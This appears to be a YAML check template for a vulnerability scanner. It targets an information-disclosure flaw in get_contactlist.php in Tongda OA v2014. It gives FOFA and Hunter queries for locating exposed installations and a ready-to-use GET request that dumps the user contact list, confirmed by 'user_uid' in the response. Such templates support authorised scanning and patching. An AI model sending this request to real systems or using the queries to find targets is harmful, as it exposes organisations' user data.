product: 通达OA
vName: 通达OA get_contactlist.php敏感信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 通达OA（OfficeAnywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞，攻击者通过漏洞可以获取敏感信息.
version: 通达OA v2014
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://blog.csdn.net/qq_44877321/article/details/129021869
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - user_uid
            logic: and